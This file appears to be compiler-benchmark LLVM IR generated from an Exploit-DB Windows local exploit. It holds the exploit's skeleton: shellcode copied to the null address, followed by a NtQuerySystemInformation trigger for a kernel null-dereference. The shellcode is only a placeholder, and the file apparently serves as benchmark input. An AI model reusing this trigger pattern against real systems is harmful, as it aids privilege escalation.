; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows_x86/local/extr_43192.c_exploit.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows_x86/local/extr_43192.c_exploit.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@shellcode = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @exploit() #0 {
  %1 = alloca [8 x i32], align 16
  %2 = alloca i32, align 4
  %3 = getelementptr inbounds [8 x i32], [8 x i32]* %1, i64 0, i64 0
  %4 = call i32 @RtlZeroMemory(i32* %3, i32 32)
  %5 = getelementptr inbounds [8 x i32], [8 x i32]* %1, i64 0, i64 0
  %6 = call i32 @NtQuerySystemInformation(i32 185, i32* %5, i32 32, i32* %2)
  %7 = load i32, i32* @shellcode, align 4
  %8 = call i32 @RtlCopyMemory(i32* null, i32 %7, i32 256)
  %9 = getelementptr inbounds [8 x i32], [8 x i32]* %1, i64 0, i64 0
  %10 = call i32 @RtlZeroMemory(i32* %9, i32 32)
  %11 = getelementptr inbounds [8 x i32], [8 x i32]* %1, i64 0, i64 0
  %12 = call i32 @NtQuerySystemInformation(i32 185, i32* %11, i32 32, i32* %2)
  ret void
}

declare dso_local i32 @RtlZeroMemory(i32*, i32) #1

declare dso_local i32 @NtQuerySystemInformation(i32, i32*, i32, i32*) #1

declare dso_local i32 @RtlCopyMemory(i32*, i32, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
